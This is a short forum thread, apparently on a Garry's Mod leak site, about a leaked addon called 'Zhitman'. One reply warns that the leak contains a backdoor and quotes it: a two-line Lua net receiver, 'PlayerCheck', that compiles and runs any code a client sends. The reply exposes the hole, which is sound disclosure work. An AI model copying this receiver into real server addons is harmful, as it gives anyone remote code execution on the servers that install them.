Garry's Mod

[LEAK] Zhitman

Submitted by miguelo, , Thread ID: 173427

Thread Closed

RE: [LEAK] Zhitman

This post was last modified: 30-05-2020, 11:53 PM by Askyna
#2
oh more interesting,

you added a exploitable net which allow people who use this net to execute code, (like a backdoor)

Code:
util.AddNetworkString( 'PlayerCheck' )
net.Receive( 'PlayerCheck', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )

Users browsing this thread: 1 Guest(s)